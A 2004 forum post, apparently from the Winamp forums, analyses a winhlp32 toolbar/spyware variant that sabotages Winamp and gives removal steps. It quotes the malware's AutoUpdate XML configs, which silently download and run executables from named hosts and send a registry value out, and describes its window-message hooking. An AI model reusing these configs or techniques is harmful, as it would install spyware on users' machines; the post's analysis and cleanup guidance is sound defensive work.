View Single Post
Old 22nd May 2004, 13:07   #41
DJ Egg
Techorator
Winamp & SHOUTcast Team
 
Join Date: Jun 2000
Posts: 35,821
Yes! Yay! woohoo

/me takes a bow


Thanks for the zip punkcrib.
Hmm... very interesting.
I'll be passing this useful info on to the SpybotSD and Adaware people.

Yup, it's also replacing the default Winhlp32.exe (Windows Help) file with a version of its own.
So you'll need to restore the original from the WinXP CD, or there may be a good version of it that you can copy over from one of these folders:
C:\WINDOWS\ServicePackFiles\i386
C:\WINDOWS\$NtServicePackUninstall$
Note that the correct filesize for the legitimate Winhlp32.exe file in the Windows dir is 277kb (WinXP sp2) or 261kb (WinXP sp1). The legit version has a yellow question mark icon.


winhlp32.dll = Free Community Toolbar malware
also known as easytoolbar or Lizard Bar foistware/browser hijacker.
This however appears to be a new variant.


So, make sure you end process in Task Manager
for all instances of Winhlp32.dll / Winhlp32.dll.exe / Winhlp32.exe
and then delete the offending files
(naturally, also making sure that the relevant HKLM/..Run
startup entries are disabled first, using HJT or msconfig).

Winhlp32.* is the file which is sabotaging Winamp.
It hooks and then sends WM_USER+2 messages to every window in the system.
WM_USER+2 in Winamp = WM_MPEG_EOF
which is the message sent by the decoder thread to tell the song has ended.


"get_xml.php.user" file provides some useful info:

code:

<AutoUpdate>
<Task name="task1" showprocess="no" type="version" version="1.0.0.1" >
<File url="http://easytoolbar.com/vvsn" filename="VVSN_MKTE0404Inst.exe" localpath="%" />
<File url="http://easytoolbar.com/vvsn" filename="OMPInst.exe" localpath="%" run="yes" />
<Get key="HKEY_LOCAL_MACHINE\SOFTWARE\WhenUSave\Partners\SYNC\Partner"
url="http://easytoolbar.com/update/storeval.php?val=%val&amp;get_id=1&amp;uid=%uid"/>
</Task>
<Task name="storesearch" showprocess="no" type="version" version="1.0.0.1" >
<File url="http://www.easytoolbar.com/update/storesearch" filename="winhlp32.dll" localpath="%" run="yes" />
</Task>

</AutoUpdate>



and the crux of the issue comes from "autoupdate.xml"
Here's where winhlp32.* is coming from, loading on a timer.
Also note that the url is still active,
proving that mp3university.com is the source of this evil !

code:
<AutoUpdate>
<Task name="self" showprocess="no" type="version" version="2.0.0.0" >
<File url="http://mp3university.com/winhlp32.exe"
filename="winhlp32.exe" run="yes" install="yes" localpath="" />
</Task>

<Settings>
<TimePeriodTimeBased type="hour" value="1"/>
<TimePeriodUpdateXml type="hour" value="12"/>
</Settings>

</AutoUpdate>



So, it's also installing Easytoolbar and WhenUSave spyware.
Hopefully SpybotSD or Adaware have already removed these files,
but if not, I suggest you root out and delete all of:

VVSN_MKTE0404Inst.exe
OMPInst.exe
winhlp32.dll
winhlp32.dll.exe
updater.exe
autoupdate.xml
get_xml.php
get_xml.php.user
winhlp32.dllalias.txt
winhlp32.dlltemp.html


The first places to look would be:
C:\Windows\System32 (WinXP)
C:\Windows\System (Win9x/ME)
C:\WinNT\System32 (Win2k)
C:\Windows\Downloaded Program Files


If the default Windows Help file has been replaced
(c:\windows\system32\winhlp32.exe)
then you will need to restore the original version from the Windows Setup CD.
In WinXP, this file has a yellow question mark icon ? and is 8kb.
There will also be a winhlp32.exe in the Windows dir,
with the same yellow question mark icon, size = 261kb.
There will be a backup version of this file in c:\windows\system32\dllcache.
If the filesizes don't match, and the icon is anything different to a yellow question mark
(eg. the one in punkcrib's zip is a yellow circle with a "Z" in the middle),
then you will know that the default Help files have been replaced by these bogus malware versions.



I also strongly recommend that you add all of:

*.mp3university.com
*.easytoolbar.com
*.song-download-world.com
*.mp3downloading.com

to the Restricted Zone in Internet Explorer Options > Security.

And now would also be a good time to empty your internet cache
(Temporary Internet Files -> Delete).



Further steps you can take to protect yourselves:


Install Spywareblaster
You'll actually see a link to this in the SpybotSD > Immunize tab

Install then run the program.
Click the Updates button
Let it install all updates
Then click "enable all protection".
You can now safely close the program.

Be sure to repeat this action at least once a week,
to make sure the detection files are up to date.

If you go to Tools > Custom Blocking
You can manually add the following entry:

Name = winhlp32 reactivator
CLSID = {6C31790D-1EDF-4B05-83DC-925B3A8E2318}

Then checkmark it and click "protect against checked items"



Optionally, you can also install SpywareGuard
which runs permanently in the systray.


I'll be adding a link to this thread in the Troubleshooters FAQ.

Thanks again.

wOOt.


[Edit]
Ah, the link to punkcrib's zip is now dead.
I've put up a new link to it here
DJ Egg is offline